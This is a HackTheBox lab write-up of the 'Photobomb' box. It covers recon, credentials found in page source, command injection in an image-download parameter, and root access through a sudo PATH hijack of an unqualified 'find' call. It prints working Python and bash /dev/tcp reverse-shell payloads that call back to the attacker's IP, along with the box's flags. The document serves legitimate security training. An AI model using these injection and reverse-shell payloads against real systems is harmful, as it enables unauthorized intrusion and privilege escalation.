---
title: "HackTheBox - Photobomb Writeup"
summary: "Writeup of Photobomb box on HTB"
categories: ["writeup"]
tags: ["htb", "web", "injection", "absolute_path"]
showSummary: true
date: 2023-02-15
draft: false
---

## Recon
Firstly, we run `nmap`:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/htb/photobomb]
└─$ nmap -A -T5 10.10.11.182
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-15 16:13 CET
Warning: 10.10.11.182 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.182
Host is up (0.027s latency).
Not shown: 944 closed tcp ports (conn-refused), 54 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.26 seconds
```

As we can see, we need to add the following line on our `/ect/hosts` to visit the webserver:
`10.10.11.182    photobomb.htb`

We found a web page and a link on it invites us to authenticate:
![0b2edf11d633b2a3222e51c206521cd8.png](img/0b2edf11d633b2a3222e51c206521cd8.png)

By looking at source files, we found creds:
![7ec7b4af05e78d08486749271ce13b49.png](img/7ec7b4af05e78d08486749271ce13b49.png)

So we can authenticate with `pH0t0` as username and `b0Mb!` as password.

## Exploit
Now, we see a page where we can donwload an image. 
![bf236c005d1bfadb5bfbffe535981304.png](img/bf236c005d1bfadb5bfbffe535981304.png)

We try to fuzz each parameter to see if we can run a command. And indeed, we can add `;<cmd>` after `filetype` parameter.

We'll use this payload:
```bash
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```

Here is the request:
```
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 296
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;export+RHOST="10.10.14.48";export+RPORT=1234;python3+-c+'import+socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd)+for+fd+in+(0,1,2)];pty.spawn("/bin/sh")'&dimensions=123000x2000
```

Once we've started a listener, we got a shell:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/htb/photobomb]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.11.182] 46586
$ bash
bash
wizard@photobomb:~$ ls -la
ls -la
total 864
drwxr-xr-x 7 wizard wizard   4096 Jan 15 16:04 .
drwxr-xr-x 3 root   root     4096 Sep 16 15:14 ..
lrwxrwxrwx 1 wizard wizard      9 Mar 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 wizard wizard    220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 wizard wizard   3771 Feb 25  2020 .bashrc
drwx------ 2 wizard wizard   4096 Sep 16 15:14 .cache
-rwxr-xr-x 1 wizard wizard      5 Jan 15 16:05 find
drwxrwxr-x 4 wizard wizard   4096 Sep 16 15:14 .gem
drwx------ 3 wizard wizard   4096 Jan 15 15:20 .gnupg
-rwxr-xr-x 1 wizard wizard 828087 Jan 15 15:19 linpeas.sh
drwxrwxr-x 3 wizard wizard   4096 Sep 16 15:14 .local
drwxrwxr-x 6 wizard wizard   4096 Jan 15 16:05 photobomb
-rw-r--r-- 1 wizard wizard    807 Feb 25  2020 .profile
-rw-r----- 1 root   wizard     33 Jan 15 15:14 user.txt
-rw------- 1 wizard wizard    728 Jan 15 15:40 .viminfo
wizard@photobomb:~$ cat user
cat user.txt 
7bd9dddb6e763019ce5704c59b99049c
```

## PrivEsc
Now, we enumerate our possible `sudo` privileges:
```bash
wizard@photobomb:~$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
```

As we can execute `/opt/cleanup.sh` as `sudo`, we'll print the script in order to find a vulnerability:
```bash
wizard@photobomb:~$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
```

The creator of the script didn't set an absolute path for the `find` command. As we have the capabilities `SETENV`  with `sudo`, we can create a script named `find` under `/tmp` an set the path to `/tmp`.

Let's create a script named `find` under `/tmp` and execute `/opt/cleanup.sh` with `/tmp` as path:
```bash
wizard@photobomb:~/photobomb$ echo "/bin/bash -i >& /dev/tcp/10.10.14.48/4444 0>&1" > /tmp/find
wizard@photobomb:~/photobomb$ cat /tmp/find
cat /tmp/find
/bin/bash -i >& /dev/tcp/10.10.14.48/4444 0>&1
wizard@photobomb:~/photobomb$ chmod 777 /tmp/find
chmod 777 /tmp/find
wizard@photobomb:~/photobomb$ sudo PATH=/tmp /opt/cleanup.sh
sudo PATH=/tmp /opt/cleanup.sh
/opt/.bashrc: line 13: [: command not found
/opt/.bashrc: line 20: [: command not found
/opt/.bashrc: line 26: [: command not found
/opt/.bashrc: line 50: [: command not found
/opt/.bashrc: line 63: [: command not found
/opt/cleanup.sh: line 6: [: command not found
```

We've started a listener and we got a shell:
```bash
┌──(parallels㉿kali-linux-2022-2)-[~/Workspace/htb/photobomb]
└─$ nc -lvnp 4444         
listening on [any] 4444 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.11.182] 53240
bash: groups: command not found
Command 'lesspipe' is available in the following places
 * /bin/lesspipe
 * /usr/bin/lesspipe
The command could not be located because '/bin:/usr/bin' is not included in the PATH environment variable.
lesspipe: command not found
Command 'dircolors' is available in the following places
 * /bin/dircolors
 * /usr/bin/dircolors
The command could not be located because '/bin:/usr/bin' is not included in the PATH environment variable.
dircolors: command not found
root@photobomb:/home/wizard/photobomb# cd /root
cd /root
root@photobomb:~# /usr/bin/ls -la
/usr/bin/ls -la
total 32
drwx------  5 root root 4096 Sep 16 15:14 .
drwxr-xr-x 18 root root 4096 Sep 16 15:14 ..
lrwxrwxrwx  1 root root    9 Sep 16 11:50 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc
drwx------  2 root root 4096 Sep 16 15:14 .cache
drwxr-xr-x  3 root root 4096 Sep 16 15:14 .local
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-r-----  1 root root   33 Jan 15 15:14 root.txt
drwx------  2 root root 4096 Sep 16 15:14 .ssh
root@photobomb:~# /usr/bin/cat root.txt
/usr/bin/cat root.txt
bfff8626bd2b62f37dc357138c0102e3
```